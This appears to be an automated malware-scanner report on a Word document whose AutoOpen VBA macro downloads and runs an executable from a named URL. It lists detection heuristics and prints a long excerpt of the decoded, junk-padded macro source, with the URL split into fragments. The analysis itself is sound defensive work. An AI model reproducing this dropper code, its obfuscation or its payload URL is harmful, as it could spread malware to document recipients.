MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes CreateObject and Shell calls to download a second-stage executable from 'http://deliverytrackingsytem.com/update/close/files/doru1706_soft_new.exe' and execute it. The presence of these indicators strongly suggests a dropper functionality.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-6995452-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6995452-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell iijbjq, sffgi -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
jbio.Write fchsyay.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fchsyay = CreateObject("Microsoft.XMLHTTP") -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://deliverytrackingsytem.com/update/close/files/doru1706_soft_new.exe Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 116466 bytes |
SHA-256: bbf9a6af909f6b3b78e35b6e72efc91f1e97992cf07a6cde641c75e953c848a4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() Dim oxryqvi As String oxryqvi = "-22377" Dim sfbnse0 As Integer sfbnse0 = -14339 For E = 32 To 33 anzuziu = 8881 Next E v = -3178 uo = -57496 qae = (v Or uo) For bb = 23 To 23 natsljp = bb Next bb For ywpi = 70 To 71 vedlze = -13885 Next ywpi jco = 24437 j = -40637 ou = (jco Or j) Dim hxclzhs As Double hxclzhs = -52891.45535 qy = 50128 wm = 23791 mh = (qy Xor wm) y = -19612 wx = -39249 eko = Not (y > wx) Dim mzizq As Double mzizq = 21365.60324 Dim tdpdkka As Boolean tdpdkka = False Dim fcboe51 As Double fcboe51 = 64911.18128 For czi = 48 To 49 knmiec86 = -3464 Next czi Dim eowc12 As Double eowc12 = -23153.58745 For g = 53 To 53 livgmr69 = g Next g wdtcuz = ".ex" Dim bpwgtwuoa As Double bpwgtwuoa = 26033.29571 mzkm = 26641 k = 1821 miau = Not (mzkm > k) bav = 48003 iuzy = -31542 axdi04 = Not (bav > iuzy) ybwl = 46793 a = -34807 f = (ybwl Or a) ozd = 53573 Z = 6889 yug = (ozd Xor Z) For nqe = 46 To 46 wiytpe = nqe Next nqe Dim szrfoua As String szrfoua = "18831" For yai = 46 To 49 ifphlytz = ifphlytz + yai Next yai fua = 56926 trt = -18671 rhu = (fua Xor trt) wathn = 52877 eii = (Not wathn) For cnnl = 74 To 74 gboeiq = -3161 Next cnnl b = -9656 aj = (Not b) Dim aoeyo aoeyo = 18990 d = -58509 E = -618 uqi = (d Xor E) agm = 51936 wga = 42871 ekf = Not (agm > wga) Dim aoewqb aoewqb = 11596 fegkaa = "blic\y" Dim yelvlv yelvlv = -12366 For cpa = 58 To 59 dzemldp8 = "hslmgvuituwekpoy60" Next cpa Dim jheunl As String jheunl = "hg" dy = 6136 w = -15808 bv = (dy Xor w) ve = 39902 uia = -4706 s = (ve Xor uia) For co = 60 To 63 zxehqb10 = 11843 Next co brvf12 = -37099 kqbc = -25986 a = Not (brvf12 > kqbc) For o = 35 To 36 uotme80 = o Next o idt = 39849 d = 31102 ue = (idt Xor d) Dim txrriy44 As Double txrriy44 = -66626.10743 eficvo00 = "exe" yarl = -38915 bt = 55560 i = Not (yarl > bt) b = -12605 ayi = 21434 i = (b Or ayi) Dim aioptau aioptau = -9819 Dim eafafi eafafi = 17741 For yyn = 99 To 99 orwaya = "aoncpmuxi" Next yyn qou = 60385 cbjo = (Not qou) uzchzs = -59367 ixngdi84 = -14807 uncyy24 = Not (uzchzs < ixngdi84) Dim ohyh ohyh = -6117 dugl = -51851 iy = 13788 ik = (dugl Or iy) E = -57797 d = -45725 bvsh = (E Xor d) ehji7 = -25553 sm = -29058 iua = (ehji7 Or sm) Dim etpay etpay = -1797 u = -31143 fpx = 20169 a = Not (u < fpx) aiigl = 13238 rku = 59781 un = Not (aiigl < rku) For u = 97 To 98 oabf = u Next u evcuyo = "u1706_" For ui = 82 To 84 nyapvmd = "guujfykuygkdx" Next ui olsd = -23361 i = (Not olsd) For wenx = 23 To 24 bisw = wenx Next wenx For ov = 34 To 36 ytckou7 = "uomhe" Next ov For ta = 62 To 63 beat = ta Next ta o = 40945 liw = 45216 qg = (o Or liw) For wie = 32 To 33 tjiamh = tjiamh + wie Next wie otm = 25605 i = (Not otm) Dim rbbruu36 rbbruu36 = -30090 gxyz = -29251 qv = -6166 alr = (gxyz Xor qv) cg = 3884 cgi = 18715 i = (cg Or cgi) For sy = 33 To 33 zhebkbzo = "gwiaitl" Next sy ytz = 18802 qwfx = -32434 aua = (ytz Xor qwfx) For ayu = 59 To 60 xsujcdm = xsujcdm + ayu Next ayu For aisw = 26 To 26 icvgtgllm = icvgtgllm + aisw Next aisw ospa = "ew." Dim yanlre yanlre = -18321 For ual = 27 To 27 quyoay = quyoay + ual Next ual Dim fnncgli As Integer fnncgli = 9503 zee = -53411 Z = -32048 xboxu = Not (zee > Z) o = 31014 jfei = 61095 ea = (o Or jfei) bdk = -20786 qisk = -27747 E = (bdk Or qisk) Dim yueiy6 As String yueiy6 = "edzunv25" Dim rchuy85 As Integer rchuy85 = 25505 For yhbm = 99 To 102 ybiipxo5 = "aomliatcmtiu88" Next yhbm ec = -66564 ga = -62620 iey = (ec Xor ga) iay = -41566 de = 18982 ne = (iay Or de) i = 13307 uubm = 5392 aid = (i Or uubm) vzeu = -49097 eww = 43782 yudj = (vzeu Xor eww) u = -51602 qp = -35522 awtv = Not (u < qp) vou = -37064 xct = 57993 dcn = Not (vou > xct) oeuuum1 = "ngsyt" uo = -61521 tkghl = 16846 wzbwf = (uo Xor tkghl) Dim hiyoar60 As Integer hiyoar60 = -26886 xjnn = 24148 ik = 24145 woa = (xjnn Or ik) c = -30851 h = 15871 y = (c Xor h) ma = 20487 c = -4798 qjkpf = (ma Or c) For d = 11 To 11 obqyoa = "obxtdezf" Next d ioy = 7425 wnedi = 59263 fspip = Not (ioy > wnedi) hvo = -12175 uj = -22998 av = Not (hvo > uj) For E = 70 To 72 sadibh = -16712 Next E uuay = "get" mjqn = -11300 yzhfxi = 460 eijjo25 = Not (mjqn > yzhfxi) pjsg = -53553 zof = 44046 ia = Not (pjsg > zof) Dim ouzkrvr As Integer ouzkrvr = 16265 For ay = 55 To 57 ngoipkfr = ay Next ay For igwe = 63 To 64 gvljqujtm4 = gvljqujtm4 + igwe Next igwe For u = 48 To 50 exrbdk = 13498 Next u uelz = -45435 h = 61706 ke = (uelz Xor h) Dim uevta As Double uevta = 32920.49698 i = 56837 trgjy = 21464 oe = Not (i > trgjy) E = -10693 uxea = 2659 jid = Not (E > uxea) h = -54188 i = (Not h) eofue4 = "es/dor" yve = -20210 oly = 53987 uo = (yve Or oly) Dim puzgqi62 As Double puzgqi62 = -55732.2581 Dim oijmbe As Boolean oijmbe = True unafn = -43926 vtshmy = -186 moba = Not (unafn < vtshmy) For yjq = 94 To 95 voyukn = -5760 Next yjq Dim oufktqul As Boolean oufktqul = True Dim oetvamo63 As Boolean oetvamo63 = False For ea = 19 To 19 oeyyo = oeyyo + ea Next ea For t = 25 To 27 hlahko8 = t Next t For q = 99 To 99 szyttjfu = q Next q ou = 3863 kti = 33655 oia = (ou Xor kti) egiydr = "em.co" For i = 72 To 72 hcipeuh = "erdaeougtsbu" Next i For ind = 51 To 53 yaca = "qfspxcbkwl" Next ind a = 32815 aou = (Not a) Dim jrjbnlletw As Integer jrjbnlletw = 27415 ojq = 30681 hahjmb = (Not ojq) Dim oxpeu As Integer oxpeu = -21202 Dim yojtyt As Double yojtyt = -34491.39169 Dim urme As Integer urme = -4163 u = -12156 k = -24196 heff = (u Xor k) Dim sooldip As Integer sooldip = 28548 aoj = -29477 wlni = 18680 r = (aoj Or wlni) For l = 41 To 42 aoqrl1 = l Next l For iqa = 81 To 82 eiend = iqa Next iqa oua = 14984 kkqn = 7372 qovy8 = Not (oua < kkqn) Dim jrcyeau As Double jrcyeau = -54246.23568 iluo = "livery" Dim pcgcck pcgcck = -26489 wcj = -64180 dmas = -15304 fopa = Not (wcj < dmas) mrd = 15517 eu = 7338 ky = (mrd Or eu) Dim uoxqoz uoxqoz = -17186 tj = -27115 usla = -64719 qca = (tj Or usla) ui = -36527 b = 375 epqa = (ui Or b) jrgc = 4744 krbd = -30638 cqsz = (jrgc Or krbd) For fbo = 44 To 46 lelnmn28 = "ilwiaae43" Next fbo For gvuu2 = 12 To 12 mxizczf = "aoqrjhteeoeo" Next gvuu2 wfyqvgsee = "tracki" kqsci = -48010 wjglc = (Not kqsci) For ioe = 69 To 71 ilctfy = "fwieuukqjfrarv55" Next ioe elt = -50073 E = -61002 o = (elt Or E) oyy = -37089 sxoro = 35483 ui = Not (oyy < sxoro) sgmq = 36590 uoo = (Not sgmq) Dim eyvqve04 As Integer eyvqve04 = 32658 Dim cbyvds As Boolean cbyvds = True Dim uxrqtcky As Integer uxrqtcky = -20689 yj = -46581 q = -50197 uzhv = (yj Xor q) Dim ufziwo93 ufziwo93 = 10733 Dim lodo As Double lodo = 15041.2796 Dim fkiooy fkiooy = -25181 Dim ymwtnq As Integer ymwtnq = -8304 For yo = 31 To 31 rwwtao6 = rwwtao6 + yo Next yo Dim iecxcey As Integer iecxcey = -17796 For ywq = 37 To 38 wfcknkpci = 9642 Next ywq mqiox = "gwxb" hh = -10387 eau = 30488 ezqo = (hh Or eau) Dim eueuzzw eueuzzw = -10850 qzlj = -54800 u = (Not qzlj) Dim uylriuo As Integer uylriuo = 1 ia = 2190 oew = (Not ia) Dim ooovgezs As Boolean ooovgezs = False a = -50902 qww = 53478 ewma = (a Or qww) Dim ihflfmqhz As Integer ihflfmqhz = -19834 E = -929 fletb = -48294 kvbo92 = (E Or fletb) uua = -6514 ooa = (Not uua) For hze = 67 To 69 pkkgue = -12355 Next hze For zknhb = 54 To 54 yfeyic7 = 10803 Next zknhb ygj = 33284 oys = -64757 yy = Not (ygj < oys) For eo = 11 To 11 utlchrf86 = eo Next eo For o = 60 To 60 jwgjmmnj68 = jwgjmmnj68 + o Next o iua = -19929 ynhy = 25649 iunt3 = (iua Or ynhy) yy = -24918 upi = (Not yy) yipxjse2 = "/clos" o = 66131 qrysy0 = 60430 lgegcq = Not (o < qrysy0) kug = 45156 j = 24434 xen = Not (kug > j) Dim yoou yoou = 21917 lntl78 = 42971 o = 9427 askld = Not (lntl78 > o) a = -4206 vgu = -65613 nd = (a Xor vgu) hiy = -41246 tw = (Not hiy) For hsmx98 = 14 To 16 vaoou = hsmx98 Next hsmx98 i = -25564 nk = 6702 eir = (i Or nk) asjy = -26219 tr = -11602 u = (asjy Xor tr) edy = -64748 wt = 44905 i = Not (edy < wt) Dim uake uake = -26312 ayiwk04 = -35241 aowp = -30203 fmdjt91 = Not (ayiwk04 > aowp) oeoa = "m/up" yjcu = -49175 vmanda = (Not yjcu) For odzy = 59 To 60 ccorq = ccorq + odzy Next odzy yyxq = -32636 URL = 57034 yyi = (yyxq Or URL) nh = -59499 s = -15784 aii = (nh Xor s) y = 37141 ft = 41430 ctdmp = (y Xor ft) oy = -36831 vmu = -64548 omprma = Not (oy < vmu) Dim knizmf As Boolean knizmf = False Dim uikjdq As Boolean uikjdq = False epdynr = -32179 svfdh = (Not epdynr) For ie = 54 To 56 uvflep = ie Next ie hdxwj = 23347 ctfc = -36514 ajd = (hdxwj Or ctfc) vyv = 46449 vlvko1 = -32794 busg = (vyv Xor vlvko1) s = 44884 phm = -32922 ieuhr7 = Not (s < phm) uayfy = "C:\Use" ou = -1326 tryu = (Not ou) For b = 78 To 78 irsauu = b Next b omkl = -10260 aogs = (Not omkl) For i = 76 To 78 fuso = fuso + i Next i osgq85 = -60895 E = (Not osgq85) Dim gmnitkhjdm As Integer gmnitkhjdm = 4633 eesm = -19791 yii = -66267 lkd = (eesm Or yii) cuzg = 53457 mnp = 23939 nrv = (cuzg Xor mnp) fs = -11505 zc = -5374 yu = (fs Xor zc) yrmuo = "soft_n" Dim evkxpu06 evkxpu06 = 13423 g = -34440 wq = (Not g) yye = -2812 taur = -62553 o = Not (yye > taur) Dim jgbrzzbt jgbrzzbt = 23731 Dim qlnqz As Boolean qlnqz = True yi = 4207 y = (Not yi) ey = -42697 o = (Not ey) da = 36921 no = 61433 ae = Not (da > no) yfc = -66328 aocq = -55139 E = (yfc Or aocq) For um = 46 To 47 yafvvhi1 = "axrwyizuxobwoaoq" Next um dq = -21656 iecc5 = -50800 woa = (dq Or iecc5) aicrioe = "date" y = 65900 ea = 49464 jad = Not (y > ea) For o = 22 To 22 huyh = "hudqopzzoljcx" Next o Dim aauyu aauyu = 4035 euy = -20175 ug = 17400 bth = Not (euy < ug) Dim udsybz udsybz = 9323 uuie = -53800 up = (Not uuie) For egy = 44 To 46 aectic = aectic + egy Next egy am = 54004 iifx18 = -19051 zukmk = Not (am > iifx18) qruf = 22347 buck = 46381 blke = (qruf Xor buck) For lm = 53 To 53 eqny = eqny + lm Next lm a = 58513 h = -37880 Z = (a Xor h) For y = 23 To 24 yete = yete + y Next y iwb = -64127 a = -64135 tze = (iwb Or a) xmz = -54737 q = -36379 u = (xmz Or q) For ubv = 97 To 99 evvhi = ubv Next ubv For kvv = 31 To 32 eggngfa62 = eggngfa62 + kvv Next kvv eiittv = "e/fil" qbq = 4112 ay = (Not qbq) ozq = -17019 ja = -45169 u = (ozq Or ja) Dim hdbam90 As String hdbam90 = "htzeiexsoz" sw = -5838 bau = (Not sw) Dim woynwa woynwa = -16914 ic = 3466 aao = 63162 nr = (ic Or aao) yf = -33279 tf = 20796 lfsa = (yf Xor tf) wyf = 10189 dk = -6414 u = (wyf Or dk) o = 27780 omv = -23600 yir = Not (o < omv) For imbe4 = 25 To 27 oidjpxl = -4801 Next imbe4 ncu = -37421 cey = 3111 guo = (ncu Xor cey) For jxv = 40 To 40 wqwseo = -5016 Next jxv euvernu = "itrf" For ook = 92 To 92 ikoebv = ikoebv + ook Next ook For g = 58 To 59 srfcrblz = g Next g x = -7164 ia = 64082 auyvh = Not (x < ia) iqt = -23362 oiqk = -33351 ay = (iqt Or oiqk) rwjwu = 58835 r = -24290 iii = (rwjwu Xor r) Dim aiqa4 As String aiqa4 = "sarfegjyorpn5" Dim kdnommi kdnommi = 21963 Dim bpiahcozf bpiahcozf = 16280 u = -60287 kli = 31125 oul = Not (u < kli) Dim puijle5 As String puijle5 = "13023" mnkd = -14707 se = 16577 ii = (mnkd Xor se) Dim appvv7 appvv7 = -25399 kn = 31015 o = -17043 vvkhg = Not (kn > o) jke = 46423 quqs0 = 27699 h = (jke Xor quqs0) Dim ooyk3 ooyk3 = 6026 ca = 63722 stclg = -34915 evx = (ca Or stclg) Dim fnahqm fnahqm = -25741 ou = 31312 kk = 13665 un = (ou Xor kk) vvkbye = "rs\Pu" Dim qmabqisi8 As String qmabqisi8 = "fygid" For i = 47 To 50 stakggu60 = i Next i i = -12072 u = 49076 dz = (i Or u) Dim sxwwau0 sxwwau0 = -5187 For oy = 65 To 65 auuam = oy Next oy vzdxau = -1408 dcjb = 37893 E = Not (vzdxau > dcjb) o = 30956 vr = 29062 E = (o Or vr) xt = -45086 dqcbb = -54751 y = Not (xt < dqcbb) imu = -64354 vei = -40553 sm = Not (imu < vei) Dim yceett yceett = -10255 For vvyrc = 14 To 17 yamwyyi = yamwyyi + vvyrc Next vvyrc ia = 19783 i = 38092 d = (ia Or i) For vx = 39 To 40 vhmhfqy = vx Next vx efbhpe = -62209 odsq = 48368 ra = Not (efbhpe < odsq) nnyyy = -11246 E = (Not nnyyy) akwaafr = "http:/" Dim zhiye As String zhiye = "a" Dim uwayyy40 As Boolean uwayyy40 = False zi = 249 sd = (Not zi) vxu = -35734 ieua = 55306 ueyo = Not (vxu < ieua) Dim fhabqo09 As Boolean fhabqo09 = True yq = -41739 u = -62896 beo = (yq Or u) yt = -28601 hxeu = -46654 pps = (yt Xor hxeu) For eonz = 29 To 31 bvuyjgn = bvuyjgn + eonz Next eonz For pza = 99 To 102 zeardhrgs = "ewqoawweyyeqi" Next pza Dim ineugml ineugml = -22187 Dim fkpevu As Integer fkpevu = -19353 r = 11443 ayvl = 7998 sjxd = (r Xor ayvl) For ueo = 66 To 69 ryycznz87 = ueo Next ueo mx = 57206 ixt = -47316 w = (mx Xor ixt) q = -47479 eu = 16589 xj = (q Or eu) inzqms = "/de" Dim obyykd obyykd = -15011 ol = -38651 ctyys = -55966 ncsjw = Not (ol > ctyys) Dim tvegxcx9 As String tvegxcx9 = "-29670" For mv = 32 To 34 fesdea = 4101 Next mv For ob = 40 To 40 zjhurwq = -3877 Next ob rmhn30 = -26489 eae = 2863 rn = (rmhn30 Xor eae) yy = 16732 y = -32849 af = (yy Or y) dyoo = 52192 uovz = (Not dyoo) iahv25 = 61283 oob = (Not iahv25) ppe = -14612 i = -22426 vri = (ppe Xor i) Dim boxxuumc As Boolean boxxuumc = True g = -55123 io = 62096 apa = (g Xor io) For vby = 26 To 28 wpscqe = wpscqe + vby Next vby ha = 3816 vlz = 14235 n = (ha Xor vlz) Dim hoeuyo0 hoeuyo0 = 16617 For dgr = 92 To 92 zmkgattov = dgr Next dgr asuqscg = "e" For cvu = 91 To 92 uizupvkg = "gmwuo" Next cvu For y = 63 To 64 vzuoibho9 = -17274 Next y For xntt = 78 To 80 ceqssjdq98 = xntt Next xntt For eqz = 97 To 98 ejymcjp = ejymcjp + eqz Next eqz For uy = 69 To 69 uuyy1 = uy Next uy Dim gnbckjmr gnbckjmr = 7256 For u = 80 To 82 epnpaxy = 5357 Next u … |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.